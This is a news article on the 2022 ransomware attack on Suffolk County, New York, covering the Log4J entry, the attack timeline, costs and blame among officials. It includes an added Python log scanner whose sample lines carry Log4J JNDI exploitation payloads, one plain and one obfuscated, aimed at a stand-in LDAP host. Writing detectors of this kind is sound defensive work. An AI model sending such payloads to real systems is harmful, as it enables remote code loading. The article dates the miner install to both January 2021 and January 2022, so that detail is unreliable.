Suffolk County, New York was hit by a ransomware attack in September 2022 that continues to affect various county services. Read our previous update here.
An investigation has revealed that the attack started in December 2021 when hackers exploited a “Log4J vulnerability” to gain access to the county’s computer network and disable key functions. County Executive Steve Bellone revealed that the hackers demanded a ransom of $2.5 million, which the county decided not to pay.
The attack has so far cost the county $3.4 million for system restoration and $2 million for the forensic investigation with some systems still offline.
The attack has been linked to the IT Director of the county clerk’s office, who had reportedly pushed for increased security before the attack but was denied.
The timeline of the attack is as follows:
- December 19-20, 2021: Hackers gain access to the County Clerk’s Office by leveraging the Log4J vulnerability.
- January 2022: Hackers install bitcoin mining software on clerk office servers to establish a “command and control connection” within the compromised IT environment.
- March: Hackers install remote monitoring and management tools and harvest credentials of officials in the clerk’s office.
- August 18: Hackers attempt to identify members of a highly privileged administrators’ group in county government.
- August 20-21: County systems are compromised via malware run from the clerk’s office. Hackers begin harvesting the credentials of county administrators.
- September 8: County announces hack into computer networks: all websites, servers, networks taken offline.
The Log4J vulnerability is a flaw in a widely used logging library that allows remote code execution, which attackers use to drop malware or ransomware into a victim’s system. The library can be deeply embedded within other software and the exposure is often very difficult to detect. Cyber analysts recommend routine deep scans and monitoring to catch Log4J exploitation attempts.
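The “monitoring” the analysts recommend is concrete: exploitation of the Log4J vulnerability starts with a request that carries a `${jndi:...}` lookup string, so scanning web and application logs for that pattern is a standard detection. The script below is an added example and is not part of the original article or of the Palo Alto Networks investigation; the log lines it scans are constructed, the addresses are documentation ranges, and the column layout assumes a common HTTP access-log format. It goes one step beyond a plain string match by unwinding the nested `${lower:...}`, `${upper:...}` and `${...:-default}` lookups that are used to hide the keyword from naive scanners.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (not from the Suffolk County incident):
# one benign request, one plain exploitation probe in the User-Agent field,
# one probe that splits the keyword "jndi" across nested lookups, and one more
# benign request. Addresses are from RFC 5737 documentation ranges.
SAMPLE_LOG_LINES: List[str] = [
    '203.0.113.7 - - [19/Dec/2021:10:14:02 -0500] "GET /records HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [19/Dec/2021:10:15:44 -0500] "GET / HTTP/1.1" 200 133 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '198.51.100.23 - - [19/Dec/2021:10:16:01 -0500] "GET / HTTP/1.1" 200 133 "-" '
    '"${${lower:j}${upper:n}di:${lower:ldap}://198.51.100.23:1389/b}"',
    '192.0.2.9 - - [19/Dec/2021:10:17:30 -0500] "POST /login HTTP/1.1" 302 0 "-" "curl/7.68.0"',
]

# ${lower:X} / ${upper:X} evaluate to a case-folded X.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${name:key:-default} evaluates to "default" when the key is unset.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}:]*:[^${}]*:-([^${}]*)\}")
# The lookup we are actually looking for, with its protocol scheme captured.
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _fold_case(match: "re.Match[str]") -> str:
    value = match.group(2)
    return value.lower() if match.group(1).lower() == "lower" else value.upper()


def normalize_lookups(text: str) -> str:
    """Resolve case-folding and default-value lookups until none remain.

    Each pass only matches lookups whose body contains no further '${', so the
    innermost ones resolve first and nested obfuscation unwinds in a few rounds.
    """
    previous: Optional[str] = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(_fold_case, text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def scan_line(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for one log line, or None if it carries no JNDI lookup."""
    normalized = normalize_lookups(line)
    match = _JNDI_LOOKUP.search(normalized)
    if match is None:
        return None
    return {
        "source_ip": line.split(" ", 1)[0],   # first access-log column (assumed layout)
        "scheme": match.group(1).lower(),     # ldap, rmi, dns, ... as sent by the probe
        "obfuscated": normalized != line,     # True when lookups had to be unwound
        "indicator": normalized[match.start():match.end()],
    }


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan a batch of log lines and keep only the lines that produced a finding."""
    findings = []
    for line in lines:
        hit = scan_line(line)
        if hit is not None:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG_LINES):
        print(finding)
```

A finding means an exploitation attempt reached the logged service, not that the service was vulnerable; the mitigation is still to inventory and patch every component that embeds the logging library. The `obfuscated` flag is worth surfacing separately, since a probe that bothers to hide the keyword is rarely a mass scanner.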
To identify the perpetrators, the county hired digital forensic auditor Palo Alto Networks. The company’s investigation found that the hackers “installed cryptocurrency mining software on multiple servers” in the Suffolk County clerk’s office in January 2021. The hackers “continued to bypass network security and install remote monitoring and management tools as they began harvesting (user credentials of officials)” according to the report. The perpetrators are believed to be the BlackCat (or ALPHV) ransomware hacking group.
According to County Executive Steve Bellone, Republican County Clerk Judith A. Pascale should not have trusted the IT Director of her office, Peter Schlussler, who Bellone believes “seriously misled” her.
Bellone claims that the IT Director had been working independently of the clerk’s office and the clerk’s office “had no eyes on, and no ability to monitor the clerk IT environment.”
Schlussler, however, asserts that “our office attempted to purchase a more robust firewall in June to offer better protection, however that was not allowed to be pushed forward.” Newsday reports that it obtained conflicting documents between the IT Director’s office and the Clerk’s office about what would be stronger IT system protections.
Although Pascale’s office pushed for a more expensive solution to identify and prevent cyberattacks, Suffolk County settled for a “virtualized” firewall, which it believed would provide protection while saving taxpayers money. The county’s decision to go with the cheaper option may have contributed to the recent ransomware attack.
Bellone remarked that in September 2021 an unauthorized Bitcoin mining operation was discovered, which may have delayed the $1.4 million cybersecurity upgrade to the Clerk’s office that had been approved in September 2019.
In 2020, Suffolk County Police Department charged former IT Supervisor, Christopher Naples, with third-degree grand larceny, computer trespassing, public corruption, and official misconduct. He had been running a cryptocurrency operation out of the Riverhead office of the county clerk.
This incident highlights the importance of strong cybersecurity measures to prevent such attacks and to minimize their impact. Suffolk County continues to work with the FBI on a criminal investigation of the cyberattack. No further comments on the investigation or pending charges were made.
This attack on Suffolk County, NY serves as a major reminder of the ongoing threat of cyberattacks and the importance of implementing strong cybersecurity measures against potential threats. It is vital for organizations to regularly assess their security protocols and take the necessary steps to ensure their systems are protected before a hacker acts.